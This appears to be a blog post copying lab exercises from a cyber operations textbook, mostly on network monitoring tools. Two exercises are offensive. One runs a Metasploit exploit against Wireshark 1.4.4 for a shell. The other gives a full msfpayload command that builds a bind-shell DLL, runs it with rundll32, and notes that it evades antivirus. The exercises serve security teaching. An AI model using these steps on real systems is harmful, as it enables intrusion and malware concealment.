Tuesday, January 30, 2018

Exercise using payload to test wireshark and other tests

  1. The tool ss is a Linux tool comparable to netstat. Test out the tool, and the effect of the options -l (listening ports) -a (all ports) -p (process listing) -e (extended information) -i (internal information) -t (TCP) and -u (UDP).
  2. Run one or more of the Sysinternals tools from the network via live.sysinternals.com\tools.
  3. Use the Sysinternals tool pslist from the command line to list the running processes, and use pskill to kill a process.
  4. Compare and contrast TCPLogView http://www.nirsoft.net/utils/tcp_log_view.html with Sysinternals TCPView.
  5. Wireshark is vulnerable to direct attack. Install Wireshark 1.4.4 on a Windows system, and use the Metasploit module exploit/windows/misc/wireshark_packet_dect to gain a shell on the target.
  6. Install the Microsoft Network Monitor, available from http://www.microsoft.com/en-us/download/details.aspx?id=4865. Use it to capture packets during a Metasploit attack against a browser using the reverse HTTPS Meterpreter payload. Can you identify the Meterpreter traffic in the packet capture?
  7. (Advanced) The command
    msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -t dll -o test.dll
    is used to create raw (R) shellcode for a Windows shell that binds to port 4444 on a system. This is piped to an encoder that converts the result to a .dll and stores the result in the output file test.dll.
    Copy test.dll to a Windows system, and run it using rundll32.exe
    C:\> rundll32.exe test.dll,1
    Connect to the listening shell by configuring /exploit/multi/handler.
    Despite the fact that test.dll is purely shellcode, notice that Process Explorer reports the application as signed, and Virus Total does not see it as suspicious.
From Cyber Operations: Building, Defending, and Attacking Modern Computer Networks

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